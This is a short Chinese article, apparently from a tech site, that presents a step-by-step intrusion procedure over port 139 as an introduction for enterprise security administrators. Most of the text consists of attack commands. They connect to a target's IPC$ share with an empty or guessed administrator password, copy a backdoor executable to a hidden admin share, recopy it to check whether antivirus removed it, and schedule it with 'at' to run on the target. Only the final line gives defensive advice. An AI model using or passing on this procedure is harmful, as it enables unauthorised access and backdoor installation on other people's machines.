淺談139端口入侵
139端口入侵是一個非常基礎(chǔ)的入侵方式了,很多企業(yè)安全管理員幾乎都已經(jīng)無視了這種入侵方法。但是所謂別在小河溝里翻了船,還是希望企業(yè)安全管理員能夠全面地注意安全防范,下面就介紹一下139端口入侵方式。
net use \\192.168.0.1\ipc$Content$nbsp;"" /user:administrator
首先,連接的命令是:
net<空格>use<空格>\\IP地址\ipc$Content$lt;空格>密碼<空格>/user:用戶名
假設(shè)我要連接的目標IP地址是:192.168.1.11,用戶名是google,使用的密碼是123456,那么連接對方139端口通道的格式就是這樣的:
net use \\192.168.1.11\ipc$Content$nbsp;123456 /user:google 如果連接成功,那么系統(tǒng)會提示"命令成功完成"!
空密碼是這樣的:
如果密碼是空的,那就在原先輸入密碼的地方以""代替。
開始查看權(quán)限:
查看登錄后用戶權(quán)限的方法很簡單,只要給目標系統(tǒng)傳個文件就可以了,如果傳誦成功,那么一般都是系統(tǒng)管理員權(quán)限了,如果不成功可能就是來訪者權(quán)限或者其他用戶組的。命令的格式是這樣的:
copy<>文件絕對路徑<>\\IP地址\文件目標路徑
比如我要將本地C盤下的a.exe文件拷貝到192.168.1.11的D盤下:
copy c:\a.exe \\192.168.1.11\d$Content$nbsp;
要注意"$"符,那是隱藏共享盤的表示符,如果對方的共享盤不是隱藏的,就不需要"$"符了。如果命令執(zhí)行成功,系統(tǒng)同樣會提示"已復(fù)制 1 個文件"
小技巧:
再次復(fù)制相同文件至相同路徑,以檢測是否存在殺毒軟件!??!
如果系統(tǒng)提示“改寫 \\192.168.1.11\d$\a.exe 嗎? (Yes/No/All):”則說明文件在還在目標系統(tǒng)上,沒有被殺毒軟件查殺(一般發(fā)送過去的都是后門程序只類的東西,只有系統(tǒng)安裝了殺毒軟件都會被殺掉)。如果沒有提示,則說明安裝了殺毒軟件。
查看目標系統(tǒng)時間,準備使用at任務(wù)計劃運行程序。
命令格式:
net<空格>time<空格>\\IP地址
例子:
net time \\192.168.1.11
系統(tǒng)會返回目標的當前時間,時間顯示后,AT任務(wù)計劃命令需要使用24小時制。比如系統(tǒng)顯示“\\192.168.1.11 的當前時間是 2006/5/10 下午 06:02”在使用到AT任務(wù)計劃命令時,這個“下午06:02”就需要換算成“18:02”!
使用AT命令為目標系統(tǒng)添加任務(wù)計劃:
格式:
at<空格>\\IP地址<空格>指定運行時間<空格>需要運行的文件路徑名
例子:
at \\192.168.1.11 18:20 d:\a.exe
139端口入侵雖然基礎(chǔ),但是一旦中招也是有很大的危害,建議用戶將Server服務(wù)關(guān)閉,信使服務(wù)與Task Scheduler服務(wù)(計劃任務(wù))也都關(guān)閉,這樣可以較全面的保護計算機在IPC通道方面的安全。
【編輯推薦】